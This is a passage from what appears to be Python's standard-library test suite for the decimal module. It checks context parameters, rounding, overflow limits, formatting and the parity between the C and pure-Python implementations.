self.assertRaises(ValueError, MyContext, **{'prec':-1})
c = MyContext(prec=1)
self.assertEqual(c.prec, 1)
self.assertRaises(InvalidOperation, c.quantize, Decimal('9e2'), 0)
# rounding
self.assertRaises(TypeError, MyContext, **{'rounding':'XYZ'})
c = MyContext(rounding=ROUND_DOWN, prec=1)
self.assertEqual(c.rounding, ROUND_DOWN)
self.assertEqual(c.plus(Decimal('9.9')), 9)
# Emin
self.assertRaises(ValueError, MyContext, **{'Emin':5})
c = MyContext(Emin=-1, prec=1)
self.assertEqual(c.Emin, -1)
x = c.add(Decimal('1e-99'), Decimal('2.234e-2000'))
self.assertEqual(x, Decimal('0.0'))
for signal in (Inexact, Underflow, Subnormal, Rounded, Clamped):
self.assertTrue(c.flags[signal])
# Emax
self.assertRaises(ValueError, MyContext, **{'Emax':-1})
c = MyContext(Emax=1, prec=1)
self.assertEqual(c.Emax, 1)
self.assertRaises(Overflow, c.add, Decimal('1e99'), Decimal('2.234e2000'))
if self.decimal == C:
for signal in (Inexact, Overflow, Rounded):
self.assertTrue(c.flags[signal])
# capitals
self.assertRaises(ValueError, MyContext, **{'capitals':-1})
c = MyContext(capitals=0)
self.assertEqual(c.capitals, 0)
x = c.create_decimal('1E222')
self.assertEqual(c.to_sci_string(x), '1e+222')
# clamp
self.assertRaises(ValueError, MyContext, **{'clamp':2})
c = MyContext(clamp=1, Emax=99)
self.assertEqual(c.clamp, 1)
x = c.plus(Decimal('1e99'))
self.assertEqual(str(x), '1.000000000000000000000000000E+99')
# flags
self.assertRaises(TypeError, MyContext, **{'flags':'XYZ'})
c = MyContext(flags=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.flags[signal])
c.clear_flags()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.flags[signal])
# traps
self.assertRaises(TypeError, MyContext, **{'traps':'XYZ'})
c = MyContext(traps=[Rounded, DivisionByZero])
for signal in (Rounded, DivisionByZero):
self.assertTrue(c.traps[signal])
c.clear_traps()
for signal in OrderedSignals[decimal]:
self.assertFalse(c.traps[signal])
class CContextSubclassing(ContextSubclassing):
decimal = C
class PyContextSubclassing(ContextSubclassing):
decimal = P
@skip_if_extra_functionality
class CheckAttributes(unittest.TestCase):
def test_module_attributes(self):
# Architecture dependent context limits
self.assertEqual(C.MAX_PREC, P.MAX_PREC)
self.assertEqual(C.MAX_EMAX, P.MAX_EMAX)
self.assertEqual(C.MIN_EMIN, P.MIN_EMIN)
self.assertEqual(C.MIN_ETINY, P.MIN_ETINY)
self.assertTrue(C.HAVE_THREADS is True or C.HAVE_THREADS is False)
self.assertTrue(P.HAVE_THREADS is True or P.HAVE_THREADS is False)
self.assertEqual(C.__version__, P.__version__)
self.assertEqual(dir(C), dir(P))
def test_context_attributes(self):
x = [s for s in dir(C.Context()) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Context()) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
def test_decimal_attributes(self):
x = [s for s in dir(C.Decimal(9)) if '__' in s or not s.startswith('_')]
y = [s for s in dir(P.Decimal(9)) if '__' in s or not s.startswith('_')]
self.assertEqual(set(x) - set(y), set())
class Coverage(unittest.TestCase):
def test_adjusted(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal('1234e9999').adjusted(), 10002)
# XXX raise?
self.assertEqual(Decimal('nan').adjusted(), 0)
self.assertEqual(Decimal('inf').adjusted(), 0)
def test_canonical(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
x = Decimal(9).canonical()
self.assertEqual(x, 9)
c = getcontext()
x = c.canonical(Decimal(9))
self.assertEqual(x, 9)
def test_context_repr(self):
c = self.decimal.DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[self.decimal]:
c.flags[sig] = False
c.traps[sig] = False
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[], traps=[])"
self.assertEqual(s, t)
def test_implicit_context(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
# abs
self.assertEqual(abs(Decimal("-10")), 10)
# add
self.assertEqual(Decimal("7") + 1, 8)
# divide
self.assertEqual(Decimal("10") / 5, 2)
# divide_int
self.assertEqual(Decimal("10") // 7, 1)
# fma
self.assertEqual(Decimal("1.2").fma(Decimal("0.01"), 1), 1)
self.assertIs(Decimal("NaN").fma(7, 1).is_nan(), True)
# three arg power
self.assertEqual(pow(Decimal(10), 2, 7), 2)
# exp
self.assertEqual(Decimal("1.01").exp(), 3)
# is_normal
self.assertIs(Decimal("0.01").is_normal(), False)
# is_subnormal
self.assertIs(Decimal("0.01").is_subnormal(), True)
# ln
self.assertEqual(Decimal("20").ln(), 3)
# log10
self.assertEqual(Decimal("20").log10(), 1)
# logb
self.assertEqual(Decimal("580").logb(), 2)
# logical_invert
self.assertEqual(Decimal("10").logical_invert(), 1)
# minus
self.assertEqual(-Decimal("-10"), 10)
# multiply
self.assertEqual(Decimal("2") * 4, 8)
# next_minus
self.assertEqual(Decimal("10").next_minus(), 9)
# next_plus
self.assertEqual(Decimal("10").next_plus(), Decimal('2E+1'))
# normalize
self.assertEqual(Decimal("-10").normalize(), Decimal('-1E+1'))
# number_class
self.assertEqual(Decimal("10").number_class(), '+Normal')
# plus
self.assertEqual(+Decimal("-1"), -1)
# remainder
self.assertEqual(Decimal("10") % 7, 3)
# subtract
self.assertEqual(Decimal("10") - 7, 3)
# to_integral_exact
self.assertEqual(Decimal("1.12345").to_integral_exact(), 1)
# Boolean functions
self.assertTrue(Decimal("1").is_canonical())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("1").is_finite())
self.assertTrue(Decimal("snan").is_snan())
self.assertTrue(Decimal("-1").is_signed())
self.assertTrue(Decimal("0").is_zero())
self.assertTrue(Decimal("0").is_zero())
# Copy
with localcontext() as c:
c.prec = 10000
x = 1228 ** 1523
y = -Decimal(x)
z = y.copy_abs()
self.assertEqual(z, x)
z = y.copy_negate()
self.assertEqual(z, x)
z = y.copy_sign(Decimal(1))
self.assertEqual(z, x)
def test_divmod(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
with localcontext() as c:
q, r = divmod(Decimal("10912837129"), 1001)
self.assertEqual(q, Decimal('10901935'))
self.assertEqual(r, Decimal('194'))
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
q, r = divmod(Decimal("NaN"), 7)
self.assertTrue(q.is_nan() and r.is_nan())
c.traps[InvalidOperation] = False
c.clear_flags()
q, r = divmod(Decimal("inf"), Decimal("inf"))
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal("inf"), 101)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
q, r = divmod(Decimal(0), 0)
self.assertTrue(q.is_nan() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation])
c.traps[DivisionByZero] = False
c.clear_flags()
q, r = divmod(Decimal(11), 0)
self.assertTrue(q.is_infinite() and r.is_nan())
self.assertTrue(c.flags[InvalidOperation] and
c.flags[DivisionByZero])
def test_power(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
Overflow = self.decimal.Overflow
Rounded = self.decimal.Rounded
with localcontext() as c:
c.prec = 3
c.clear_flags()
self.assertEqual(Decimal("1.0") ** 100, Decimal('1.00'))
self.assertTrue(c.flags[Rounded])
c.prec = 1
c.Emax = 1
c.Emin = -1
c.clear_flags()
c.traps[Overflow] = False
self.assertEqual(Decimal(10000) ** Decimal("0.5"), Decimal('inf'))
self.assertTrue(c.flags[Overflow])
def test_quantize(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
with localcontext() as c:
c.prec = 1
c.Emax = 1
c.Emin = -1
c.traps[InvalidOperation] = False
x = Decimal(99).quantize(Decimal("1e1"))
self.assertTrue(x.is_nan())
def test_radix(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
c = getcontext()
self.assertEqual(Decimal("1").radix(), 10)
self.assertEqual(c.radix(), 10)
def test_rop(self):
Decimal = self.decimal.Decimal
for attr in ('__radd__', '__rsub__', '__rmul__', '__rtruediv__',
'__rdivmod__', '__rmod__', '__rfloordiv__', '__rpow__'):
self.assertIs(getattr(Decimal("1"), attr)("xyz"), NotImplemented)
def test_round(self):
# Python3 behavior: round() returns Decimal
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 28
self.assertEqual(str(Decimal("9.99").__round__()), "10")
self.assertEqual(str(Decimal("9.99e-5").__round__()), "0")
self.assertEqual(str(Decimal("1.23456789").__round__(5)), "1.23457")
self.assertEqual(str(Decimal("1.2345").__round__(10)), "1.2345000000")
self.assertEqual(str(Decimal("1.2345").__round__(-10)), "0E+10")
self.assertRaises(TypeError, Decimal("1.23").__round__, "5")
self.assertRaises(TypeError, Decimal("1.23").__round__, 5, 8)
def test_create_decimal(self):
c = self.decimal.Context()
self.assertRaises(ValueError, c.create_decimal, ["%"])
def test_int(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
with localcontext() as c:
c.prec = 9999
x = Decimal(1221**1271) / 10**3923
self.assertEqual(int(x), 1)
self.assertEqual(x.to_integral(), 2)
def test_copy(self):
Context = self.decimal.Context
c = Context()
c.prec = 10000
x = -(1172 ** 1712)
y = c.copy_abs(x)
self.assertEqual(y, -x)
y = c.copy_negate(x)
self.assertEqual(y, -x)
y = c.copy_sign(x, 1)
self.assertEqual(y, -x)
class CCoverage(Coverage):
decimal = C
class PyCoverage(Coverage):
decimal = P
class PyFunctionality(unittest.TestCase):
"""Extra functionality in decimal.py"""
def test_py_alternate_formatting(self):
# triples giving a format, a Decimal, and the expected result
Decimal = P.Decimal
localcontext = P.localcontext
test_values = [
# Issue 7094: Alternate formatting (specified by #)
('.0e', '1.0', '1e+0'),
('#.0e', '1.0', '1.e+0'),
('.0f', '1.0', '1'),
('#.0f', '1.0', '1.'),
('g', '1.1', '1.1'),
('#g', '1.1', '1.1'),
('.0g', '1', '1'),
('#.0g', '1', '1.'),
('.0%', '1.0', '100%'),
('#.0%', '1.0', '100.%'),
]
for fmt, d, result in test_values:
self.assertEqual(format(Decimal(d), fmt), result)
class PyWhitebox(unittest.TestCase):
"""White box testing for decimal.py"""
def test_py_exact_power(self):
# Rarely exercised lines in _power_exact.
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
c.prec = 8
x = Decimal(2**16) ** Decimal("-0.5")
self.assertEqual(x, Decimal('0.00390625'))
x = Decimal(2**16) ** Decimal("-0.6")
self.assertEqual(x, Decimal('0.0012885819'))
x = Decimal("256e7") ** Decimal("-0.5")
x = Decimal(152587890625) ** Decimal('-0.0625')
self.assertEqual(x, Decimal("0.2"))
x = Decimal("152587890625e7") ** Decimal('-0.0625')
x = Decimal(5**2659) ** Decimal('-0.0625')
c.prec = 1
x = Decimal("152587890625") ** Decimal('-0.5')
c.prec = 201
x = Decimal(2**578) ** Decimal("-0.5")
def test_py_immutability_operations(self):
# Do operations and check that it didn't change internal objects.
Decimal = P.Decimal
DefaultContext = P.DefaultContext
setcontext = P.setcontext
c = DefaultContext.copy()
c.traps = dict((s, 0) for s in OrderedSignals[P])
setcontext(c)
d1 = Decimal('-25e55')
b1 = Decimal('-25e55')
d2 = Decimal('33e+33')
b2 = Decimal('33e+33')
def checkSameDec(operation, useOther=False):
if useOther:
eval("d1." + operation + "(d2)")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
self.assertEqual(d2._sign, b2._sign)
self.assertEqual(d2._int, b2._int)
self.assertEqual(d2._exp, b2._exp)
else:
eval("d1." + operation + "()")
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
Decimal(d1)
self.assertEqual(d1._sign, b1._sign)
self.assertEqual(d1._int, b1._int)
self.assertEqual(d1._exp, b1._exp)
checkSameDec("__abs__")
checkSameDec("__add__", True)
checkSameDec("__divmod__", True)
checkSameDec("__eq__", True)
checkSameDec("__ne__", True)
checkSameDec("__le__", True)
checkSameDec("__lt__", True)
checkSameDec("__ge__", True)
checkSameDec("__gt__", True)
checkSameDec("__float__")
checkSameDec("__floordiv__", True)
checkSameDec("__hash__")
checkSameDec("__int__")
checkSameDec("__trunc__")
checkSameDec("__mod__", True)
checkSameDec("__mul__", True)
checkSameDec("__neg__")
checkSameDec("__bool__")
checkSameDec("__pos__")
checkSameDec("__pow__", True)
checkSameDec("__radd__", True)
checkSameDec("__rdivmod__", True)
checkSameDec("__repr__")
checkSameDec("__rfloordiv__", True)
checkSameDec("__rmod__", True)
checkSameDec("__rmul__", True)
checkSameDec("__rpow__", True)
checkSameDec("__rsub__", True)
checkSameDec("__str__")
checkSameDec("__sub__", True)
checkSameDec("__truediv__", True)
checkSameDec("adjusted")
checkSameDec("as_tuple")
checkSameDec("compare", True)
checkSameDec("max", True)
checkSameDec("min", True)
checkSameDec("normalize")
checkSameDec("quantize", True)
checkSameDec("remainder_near", True)
checkSameDec("same_quantum", True)
checkSameDec("sqrt")
checkSameDec("to_eng_string")
checkSameDec("to_integral")
def test_py_decimal_id(self):
Decimal = P.Decimal
d = Decimal(45)
e = Decimal(d)
self.assertEqual(str(e), '45')
self.assertNotEqual(id(d), id(e))
def test_py_rescale(self):
# Coverage
Decimal = P.Decimal
localcontext = P.localcontext
with localcontext() as c:
x = Decimal("NaN")._rescale(3, ROUND_UP)
self.assertTrue(x.is_nan())
def test_py__round(self):
# Coverage
Decimal = P.Decimal
self.assertRaises(ValueError, Decimal("3.1234")._round, 0, ROUND_UP)
class CFunctionality(unittest.TestCase):
"""Extra functionality in _decimal"""
@requires_extra_functionality
def test_c_ieee_context(self):
# issue 8786: Add support for IEEE 754 contexts to decimal module.
IEEEContext = C.IEEEContext
DECIMAL32 = C.DECIMAL32
DECIMAL64 = C.DECIMAL64
DECIMAL128 = C.DECIMAL128
def assert_rest(self, context):
self.assertEqual(context.clamp, 1)
assert_signals(self, context, 'traps', [])
assert_signals(self, context, 'flags', [])
c = IEEEContext(DECIMAL32)
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 96)
self.assertEqual(c.Emin, -95)
assert_rest(self, c)
c = IEEEContext(DECIMAL64)
self.assertEqual(c.prec, 16)
self.assertEqual(c.Emax, 384)
self.assertEqual(c.Emin, -383)
assert_rest(self, c)
c = IEEEContext(DECIMAL128)
self.assertEqual(c.prec, 34)
self.assertEqual(c.Emax, 6144)
self.assertEqual(c.Emin, -6143)
assert_rest(self, c)
# Invalid values
self.assertRaises(OverflowError, IEEEContext, 2**63)
self.assertRaises(ValueError, IEEEContext, -1)
self.assertRaises(ValueError, IEEEContext, 1024)
@requires_extra_functionality
def test_c_context(self):
Context = C.Context
c = Context(flags=C.DecClamped, traps=C.DecRounded)
self.assertEqual(c._flags, C.DecClamped)
self.assertEqual(c._traps, C.DecRounded)
@requires_extra_functionality
def test_constants(self):
# Condition flags
cond = (
C.DecClamped, C.DecConversionSyntax, C.DecDivisionByZero,
C.DecDivisionImpossible, C.DecDivisionUndefined,
C.DecFpuError, C.DecInexact, C.DecInvalidContext,
C.DecInvalidOperation, C.DecMallocError,
C.DecFloatOperation, C.DecOverflow, C.DecRounded,
C.DecSubnormal, C.DecUnderflow
)
# IEEEContext
self.assertEqual(C.DECIMAL32, 32)
self.assertEqual(C.DECIMAL64, 64)
self.assertEqual(C.DECIMAL128, 128)
self.assertEqual(C.IEEE_CONTEXT_MAX_BITS, 512)
# Conditions
for i, v in enumerate(cond):
self.assertEqual(v, 1<<i)
self.assertEqual(C.DecIEEEInvalidOperation,
C.DecConversionSyntax|
C.DecDivisionImpossible|
C.DecDivisionUndefined|
C.DecFpuError|
C.DecInvalidContext|
C.DecInvalidOperation|
C.DecMallocError)
self.assertEqual(C.DecErrors,
C.DecIEEEInvalidOperation|
C.DecDivisionByZero)
self.assertEqual(C.DecTraps,
C.DecErrors|C.DecOverflow|C.DecUnderflow)
class CWhitebox(unittest.TestCase):
"""Whitebox testing for _decimal"""
def test_bignum(self):
# Not exactly whitebox, but too slow with pydecimal.
Decimal = C.Decimal
localcontext = C.localcontext
b1 = 10**35
b2 = 10**36
with localcontext() as c:
c.prec = 1000000
for i in range(5):
a = random.randrange(b1, b2)
b = random.randrange(1000, 1200)
x = a ** b
y = Decimal(a) ** Decimal(b)
self.assertEqual(x, y)
def test_invalid_construction(self):
self.assertRaises(TypeError, C.Decimal, 9, "xyz")
def test_c_input_restriction(self):
# Too large for _decimal to be converted exactly
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
Context = C.Context
localcontext = C.localcontext
with localcontext(Context()):
self.assertRaises(InvalidOperation, Decimal,
"1e9999999999999999999")
def test_c_context_repr(self):
# This test is _decimal-only because flags are not printed
# in the same order.
DefaultContext = C.DefaultContext
FloatOperation = C.FloatOperation
c = DefaultContext.copy()
c.prec = 425000000
c.Emax = 425000000
c.Emin = -425000000
c.rounding = ROUND_HALF_DOWN
c.capitals = 0
c.clamp = 1
for sig in OrderedSignals[C]:
c.flags[sig] = True
c.traps[sig] = True
c.flags[FloatOperation] = True
c.traps[FloatOperation] = True
s = c.__repr__()
t = "Context(prec=425000000, rounding=ROUND_HALF_DOWN, " \
"Emin=-425000000, Emax=425000000, capitals=0, clamp=1, " \
"flags=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow], " \
"traps=[Clamped, InvalidOperation, DivisionByZero, Inexact, " \
"FloatOperation, Overflow, Rounded, Subnormal, Underflow])"
self.assertEqual(s, t)
def test_c_context_errors(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
FloatOperation = C.FloatOperation
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
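# MAX_PREC is 425000000 in the 32-bit build of libmpdec and much larger
# in the 64-bit build.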
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# SignalDict: input validation
self.assertRaises(KeyError, c.flags.__setitem__, 801, 0)
self.assertRaises(KeyError, c.traps.__setitem__, 801, 0)
self.assertRaises(ValueError, c.flags.__delitem__, Overflow)
self.assertRaises(ValueError, c.traps.__delitem__, InvalidOperation)
self.assertRaises(TypeError, setattr, c, 'flags', ['x'])
self.assertRaises(TypeError, setattr, c, 'traps', ['y'])
self.assertRaises(KeyError, setattr, c, 'flags', {0:1})
self.assertRaises(KeyError, setattr, c, 'traps', {0:1})
# Test assignment from a signal dict with the correct length but
# one invalid key.
d = c.flags.copy()
del d[FloatOperation]
d["XYZ"] = 91283719
self.assertRaises(KeyError, setattr, c, 'flags', d)
self.assertRaises(KeyError, setattr, c, 'traps', d)
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
gt_max_emax = 10**18 if HAVE_CONFIG_64 else 10**9
# prec, Emax, Emin
for attr in ['prec', 'Emax']:
self.assertRaises(ValueError, setattr, c, attr, gt_max_emax)
self.assertRaises(ValueError, setattr, c, 'Emin', -gt_max_emax)
# prec, Emax, Emin in context constructor
self.assertRaises(ValueError, Context, prec=gt_max_emax)
self.assertRaises(ValueError, Context, Emax=gt_max_emax)
self.assertRaises(ValueError, Context, Emin=-gt_max_emax)
# Overflow in conversion
self.assertRaises(OverflowError, Context, prec=int_max+1)
self.assertRaises(OverflowError, Context, Emax=int_max+1)
self.assertRaises(OverflowError, Context, Emin=-int_max-2)
self.assertRaises(OverflowError, Context, clamp=int_max+1)
self.assertRaises(OverflowError, Context, capitals=int_max+1)
# OverflowError, general ValueError
for attr in ('prec', 'Emin', 'Emax', 'capitals', 'clamp'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, attr, int_max)
self.assertRaises(ValueError, setattr, c, attr, -int_max-1)
# OverflowError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(OverflowError, getattr(c, '_unsafe_setprec'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemax'),
int_max+1)
self.assertRaises(OverflowError, getattr(c, '_unsafe_setemin'),
-int_max-2)
# ValueError: _unsafe_setprec, _unsafe_setemin, _unsafe_setemax
if C.MAX_PREC == 425000000:
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'), 0)
self.assertRaises(ValueError, getattr(c, '_unsafe_setprec'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'), -1)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemax'),
1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'),
-1070000001)
self.assertRaises(ValueError, getattr(c, '_unsafe_setemin'), 1)
# capitals, clamp
for attr in ['capitals', 'clamp']:
self.assertRaises(ValueError, setattr, c, attr, -1)
self.assertRaises(ValueError, setattr, c, attr, 2)
self.assertRaises(TypeError, setattr, c, attr, [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, attr, 2**32)
self.assertRaises(ValueError, setattr, c, attr, 2**32+1)
# Invalid local context
self.assertRaises(TypeError, exec, 'with localcontext("xyz"): pass',
locals())
self.assertRaises(TypeError, exec,
'with localcontext(context=getcontext()): pass',
locals())
# setcontext
saved_context = getcontext()
self.assertRaises(TypeError, setcontext, "xyz")
setcontext(saved_context)
def test_rounding_strings_interned(self):
self.assertIs(C.ROUND_UP, P.ROUND_UP)
self.assertIs(C.ROUND_DOWN, P.ROUND_DOWN)
self.assertIs(C.ROUND_CEILING, P.ROUND_CEILING)
self.assertIs(C.ROUND_FLOOR, P.ROUND_FLOOR)
self.assertIs(C.ROUND_HALF_UP, P.ROUND_HALF_UP)
self.assertIs(C.ROUND_HALF_DOWN, P.ROUND_HALF_DOWN)
self.assertIs(C.ROUND_HALF_EVEN, P.ROUND_HALF_EVEN)
self.assertIs(C.ROUND_05UP, P.ROUND_05UP)
@requires_extra_functionality
def test_c_context_errors_extra(self):
Context = C.Context
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
localcontext = C.localcontext
getcontext = C.getcontext
setcontext = C.setcontext
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
c = Context()
# Input corner cases
int_max = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
# OverflowError, general ValueError
self.assertRaises(OverflowError, setattr, c, '_allcr', int_max+1)
self.assertRaises(OverflowError, setattr, c, '_allcr', -int_max-2)
if sys.platform != 'win32':
self.assertRaises(ValueError, setattr, c, '_allcr', int_max)
self.assertRaises(ValueError, setattr, c, '_allcr', -int_max-1)
# OverflowError, general TypeError
for attr in ('_flags', '_traps'):
self.assertRaises(OverflowError, setattr, c, attr, int_max+1)
self.assertRaises(OverflowError, setattr, c, attr, -int_max-2)
if sys.platform != 'win32':
self.assertRaises(TypeError, setattr, c, attr, int_max)
self.assertRaises(TypeError, setattr, c, attr, -int_max-1)
# _allcr
self.assertRaises(ValueError, setattr, c, '_allcr', -1)
self.assertRaises(ValueError, setattr, c, '_allcr', 2)
self.assertRaises(TypeError, setattr, c, '_allcr', [1,2,3])
if HAVE_CONFIG_64:
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32)
self.assertRaises(ValueError, setattr, c, '_allcr', 2**32+1)
# _flags, _traps
for attr in ['_flags', '_traps']:
self.assertRaises(TypeError, setattr, c, attr, 999999)
self.assertRaises(TypeError, setattr, c, attr, 'x')
def test_c_valid_context(self):
# These tests are for code coverage in _decimal.
DefaultContext = C.DefaultContext
Clamped = C.Clamped
Underflow = C.Underflow
Inexact = C.Inexact
Rounded = C.Rounded
Subnormal = C.Subnormal
c = DefaultContext.copy()
# Exercise all getters and setters
c.prec = 34
c.rounding = ROUND_HALF_UP
c.Emax = 3000
c.Emin = -3000
c.capitals = 1
c.clamp = 0
self.assertEqual(c.prec, 34)
self.assertEqual(c.rounding, ROUND_HALF_UP)
self.assertEqual(c.Emin, -3000)
self.assertEqual(c.Emax, 3000)
self.assertEqual(c.capitals, 1)
self.assertEqual(c.clamp, 0)
self.assertEqual(c.Etiny(), -3033)
self.assertEqual(c.Etop(), 2967)
# Exercise all unsafe setters
if C.MAX_PREC == 425000000:
c._unsafe_setprec(999999999)
c._unsafe_setemax(999999999)
c._unsafe_setemin(-999999999)
self.assertEqual(c.prec, 999999999)
self.assertEqual(c.Emax, 999999999)
self.assertEqual(c.Emin, -999999999)
@requires_extra_functionality
def test_c_valid_context_extra(self):
DefaultContext = C.DefaultContext
c = DefaultContext.copy()
self.assertEqual(c._allcr, 1)
c._allcr = 0
self.assertEqual(c._allcr, 0)
def test_c_round(self):
# Restricted input.
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
localcontext = C.localcontext
MAX_EMAX = C.MAX_EMAX
MIN_ETINY = C.MIN_ETINY
int_max = 2**63-1 if C.MAX_PREC > 425000000 else 2**31-1
with localcontext() as c:
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
-int_max-1)
self.assertRaises(InvalidOperation, Decimal("1.23").__round__,
int_max)
self.assertRaises(InvalidOperation, Decimal("1").__round__,
int(MAX_EMAX+1))
self.assertRaises(C.InvalidOperation, Decimal("1").__round__,
-int(MIN_ETINY-1))
self.assertRaises(OverflowError, Decimal("1.23").__round__,
-int_max-2)
self.assertRaises(OverflowError, Decimal("1.23").__round__,
int_max+1)
def test_c_format(self):
# Restricted input
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", [], 9)
self.assertRaises(TypeError, Decimal(1).__format__, "=10.10", 9)
self.assertRaises(TypeError, Decimal(1).__format__, [])
self.assertRaises(ValueError, Decimal(1).__format__, "<>=10.10")
maxsize = 2**63-1 if HAVE_CONFIG_64 else 2**31-1
self.assertRaises(ValueError, Decimal("1.23456789").__format__,
"=%d.1" % maxsize)
def test_c_integral(self):
Decimal = C.Decimal
Inexact = C.Inexact
localcontext = C.localcontext
x = Decimal(10)
self.assertEqual(x.to_integral(), 10)
self.assertRaises(TypeError, x.to_integral, '10')
self.assertRaises(TypeError, x.to_integral, 10, 'x')
self.assertRaises(TypeError, x.to_integral, 10)
self.assertEqual(x.to_integral_value(), 10)
self.assertRaises(TypeError, x.to_integral_value, '10')
self.assertRaises(TypeError, x.to_integral_value, 10, 'x')
self.assertRaises(TypeError, x.to_integral_value, 10)
self.assertEqual(x.to_integral_exact(), 10)
self.assertRaises(TypeError, x.to_integral_exact, '10')
self.assertRaises(TypeError, x.to_integral_exact, 10, 'x')
self.assertRaises(TypeError, x.to_integral_exact, 10)
with localcontext() as c:
x = Decimal("99999999999999999999999999.9").to_integral_value(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
x = Decimal("99999999999999999999999999.9").to_integral_exact(ROUND_UP)
self.assertEqual(x, Decimal('100000000000000000000000000'))
c.traps[Inexact] = True
self.assertRaises(Inexact, Decimal("999.9").to_integral_exact, ROUND_UP)
def test_c_funcs(self):
# Invalid arguments
Decimal = C.Decimal
InvalidOperation = C.InvalidOperation
DivisionByZero = C.DivisionByZero
getcontext = C.getcontext
localcontext = C.localcontext
self.assertEqual(Decimal('9.99e10').to_eng_string(), '99.9E+9')
self.assertRaises(TypeError, pow, Decimal(1), 2, "3")
self.assertRaises(TypeError, Decimal(9).number_class, "x", "y")
self.assertRaises(TypeError, Decimal(9).same_quantum, 3, "x", "y")
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), []
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), getcontext()
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), 10
)
self.assertRaises(
TypeError,
Decimal("1.23456789").quantize, Decimal('1e-100000'), ROUND_UP, 1000
)
with localcontext() as c:
c.clear_traps()
# Invalid arguments
self.assertRaises(TypeError, c.copy_sign, Decimal(1), "x", "y")
self.assertRaises(TypeError, c.canonical, 200)
self.assertRaises(TypeError, c.is_canonical, 200)
self.assertRaises(TypeError, c.divmod, 9, 8, "x", "y")
self.assertRaises(TypeError, c.same_quantum, 9, 3, "x", "y")
self.assertEqual(str(c.canonical(Decimal(200))), '200')
self.assertEqual(c.radix(), 10)
c.traps[DivisionByZero] = True
self.assertRaises(DivisionByZero, Decimal(9).__divmod__, 0)
self.assertRaises(DivisionByZero, c.divmod, 9, 0)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
c.traps[InvalidOperation] = True
self.assertRaises(InvalidOperation, Decimal(9).__divmod__, 0)
self.assertRaises(InvalidOperation, c.divmod, 9, 0)
self.assertTrue(c.flags[DivisionByZero])
c.traps[InvalidOperation] = True
c.prec = 2
self.assertRaises(InvalidOperation, pow, Decimal(1000), 1, 501)
def test_va_args_exceptions(self):
Decimal = C.Decimal
Context = C.Context
x = Decimal("10001111111")
for attr in ['exp', 'is_normal', 'is_subnormal', 'ln', 'log10',
'logb', 'logical_invert', 'next_minus', 'next_plus',
